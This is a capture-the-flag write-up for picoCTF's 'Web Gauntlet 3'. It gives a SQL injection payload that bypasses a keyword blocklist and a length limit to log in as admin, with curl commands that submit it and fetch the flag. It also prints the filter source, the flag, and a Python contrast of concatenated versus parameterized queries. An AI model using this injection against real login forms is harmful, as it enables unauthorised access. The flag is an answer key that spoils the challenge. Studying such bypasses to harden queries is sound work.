Web Gauntlet 3
Problem
Last time, I promise! Only 25 characters this time. Log in as admin
Site: http://mercury.picoctf.net:32946/
Filter: http://mercury.picoctf.net:32946/filter.php
Solution
The solution to this challenge is completely identical to my solution to Web Gauntlet 2.
The solution query is
user=ad'||'min'%00
and it can be sent using cURL like so:
curl --data "user=ad'||'min'%00&pass=a" http://mercury.picoctf.net:32946/index.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" --output -
The flag can be retrieved using this command:
curl http://mercury.picoctf.net:32946/filter.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" | grep picoCTF
See Web Gauntlet 2 for more information.
The code for the filter and the flag are shown in /filter.php when the login is bypassed:
<?php
session_start();
if (!isset($_SESSION["winner3"])) {
    $_SESSION["winner3"] = 0;
}
$win = $_SESSION["winner3"];
$view = ($_SERVER["PHP_SELF"] == "/filter.php");
if ($win === 0) {
    $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
    if ($view) {
        echo "Filters: ".implode(" ", $filter)."<br/>";
    }
} else if ($win === 1) {
    if ($view) {
        highlight_file("filter.php");
    }
    $_SESSION["winner3"] = 0; // <- Don't refresh!
} else {
    $_SESSION["winner3"] = 0;
}
// picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}
?>
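Why the blocklist above does not stop the query, and what does, as an added example that is not part of the original write-up or the challenge's code. It assumes a SQLite backend, a login query built by string concatenation, a combined length check, and a driver that stops parsing the statement at the first NUL byte; the function names and table contents are hypothetical.

```python
import sqlite3

# Blocklist copied from the filter.php source shown on this page.
FILTER = ["or", "and", "true", "false", "union", "like", "=", ">", "<",
          ";", "--", "/*", "*/", "admin"]
MAX_LEN = 25  # limit from the problem statement
PAYLOAD = "ad'||'min'\x00"  # the page's user value, URL-decoded


def passes_filter(user, password):
    """Assumed check: substring blocklist plus a combined length cap."""
    joined = (user + password).lower()
    return len(joined) <= MAX_LEN and not any(w in joined for w in FILTER)


def make_db():
    # Constructed sample table; the real schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db


def login_concat(db, user, password):
    """Vulnerable form: input is spliced into the SQL text."""
    sql = ("SELECT username FROM users WHERE username='" + user +
           "' AND password='" + password + "'")
    # Assumption: the driver reads the statement as a C string, so
    # everything after the first NUL byte is never parsed.
    sql = sql.split("\x00", 1)[0]
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_bound(db, user, password):
    """Hardened form: input is bound as data and never parsed as SQL."""
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (user, password)).fetchone()
    return row[0] if row else None
```

The filter only sees the split string, while SQLite's `||` operator rebuilds `admin` after the check; with bound parameters the same input is compared as a literal and matches no row.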
Flag
picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}